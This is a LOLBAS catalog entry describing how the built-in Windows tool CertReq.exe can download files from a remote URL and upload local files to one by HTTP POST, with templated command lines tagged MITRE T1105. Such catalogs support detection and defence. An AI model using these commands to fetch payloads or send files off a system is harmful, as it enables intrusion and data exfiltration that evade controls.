Catalog LOLBAS

LOL · Binary

CertReq.exe

2 techniques WindowsLOLBAS GPL-3.0

Download

File Download Windows

Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).

Use Download file from Internet

CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
Context
user
Native
Download
MITRE
T1105

Upload

File Upload Windows

Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.

Use Upload

CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}
Context
user
Native
Upload
MITRE
T1105